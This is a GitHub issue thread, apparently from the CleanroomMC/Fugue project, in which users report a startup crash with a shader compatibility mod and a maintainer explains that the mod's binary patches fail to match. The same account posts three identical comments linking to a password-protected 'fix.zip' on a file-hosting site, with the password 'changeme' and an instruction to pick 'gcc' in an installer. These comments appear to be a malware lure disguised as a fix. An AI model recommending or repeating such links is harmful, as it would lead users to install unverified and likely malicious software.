### ISSUE TITLE
光影向前兼容模组启动崩溃

### ISSUE THREAD

**Issue by LingyuDz** [CleanroomMC/Fugue#55]
[minecraft-exported-crash-info-2024-08-26T20-20-33.zip](https://github.com/user-attachments/files/16749004/minecraft-exported-crash-info-2024-08-26T20-20-33.zip)
这个是直接启动的日志，然后我看那边说是advancedshader.core.Core加载失败了，我就按昨天的办法写到那个fugueconfig的getCodeSource()里了
然后加上去之后的崩溃日志是
[minecraft-exported-crash-info-2024-08-26T21-07-40.zip](https://github.com/user-attachments/files/16749031/minecraft-exported-crash-info-2024-08-26T21-07-40.zip)
这个我看不懂...说检查模组冲突什么的，可是我其实只加了这个和optifine，而且在原本的forge端上是没有冲突的，麻烦大佬了！

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Hlwyefeng** [comment]
我也遇到了这个问题，把advancedshader.core.Core加到getCodeSource也不起作用，和楼主的错误日志是一样的

**Comment by kappa-maintainer** [comment]
advancedshader用了类似optifine的二进制ASM补丁，但匹配似乎更为严格导致补丁打不上，目前只能建议找作者

**Comment by Hlwyefeng** [comment]
那真的可惜了，作者那边停更了好像还是因为身体原因，希望不大
